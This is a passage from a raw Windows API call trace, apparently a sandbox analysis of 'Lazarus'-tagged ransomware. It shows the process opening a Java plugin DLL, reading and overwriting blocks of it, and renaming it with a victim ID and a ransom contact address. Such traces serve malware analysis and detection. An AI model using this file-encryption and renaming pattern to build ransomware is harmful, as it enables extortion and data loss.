InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.433] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11a640, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="npdeployJava1.dll", cAlternateFileName="NPDEPL~1.DLL")) returned 1 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b078 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0090.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0090.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0090.434] AreFileApisANSI () returned 1 [0090.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll", lpUsedDefaultChar=0x0) returned 66 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0090.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0090.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0090.435] AreFileApisANSI () returned 1 [0090.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0090.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82058 [0090.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 66 [0090.435] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.435] GetFileType (hFile=0x368) returned 0x1 [0090.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0090.435] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.435] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.435] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.436] CloseHandle (hObject=0x368) returned 1 [0090.436] AreFileApisANSI () returned 1 [0090.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0090.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82dd8 [0090.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 66 [0090.436] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.436] GetFileType (hFile=0x368) returned 0x1 [0090.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0090.436] CloseHandle (hObject=0x368) returned 1 [0090.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0090.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0090.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0090.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0090.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0090.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0090.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0090.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0090.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0090.438] AreFileApisANSI () returned 1 [0090.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82208 [0090.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 66 [0090.438] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11a640)) returned 1 [0090.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0090.438] AreFileApisANSI () returned 1 [0090.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0090.438] GetLastError () returned 0x0 [0090.438] SetLastError (dwErrCode=0x0) [0090.438] AreFileApisANSI () returned 1 [0090.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0090.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82208 [0090.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 66 [0090.439] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.439] GetFileType (hFile=0x368) returned 0x1 [0090.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0090.439] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0090.439] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0090.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0090.566] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0090.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0090.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0090.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4de00 [0090.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4aca8 [0090.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0090.594] GetLastError () returned 0x0 [0090.594] SetLastError (dwErrCode=0x0) [0090.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0090.594] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0090.594] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0090.595] WriteFile (in: hFile=0x368, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0090.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0090.595] CloseHandle (hObject=0x368) returned 1 [0090.669] AreFileApisANSI () returned 1 [0090.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0090.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82e68 [0090.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x82e68, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 66 [0090.669] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.669] GetFileType (hFile=0x368) returned 0x1 [0090.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82e68 | out: hHeap=0x20000) returned 1 [0090.669] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0090.669] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.670] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0090.670] GetLastError () returned 0x0 [0090.671] SetLastError (dwErrCode=0x0) [0090.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0090.671] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0090.671] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0090.671] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0090.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0090.671] CloseHandle (hObject=0x368) returned 1 [0090.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0090.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a3b0 [0090.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0090.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0090.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0090.949] AreFileApisANSI () returned 1 [0090.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0090.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82718 [0090.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x82718, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll") returned 66 [0090.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 128 [0090.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x100) returned 0x30fc0 [0090.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x30fc0, cchWideChar=128 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 128 [0090.949] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82718 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4aca8 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0090.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.950] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0xb73c66e1, 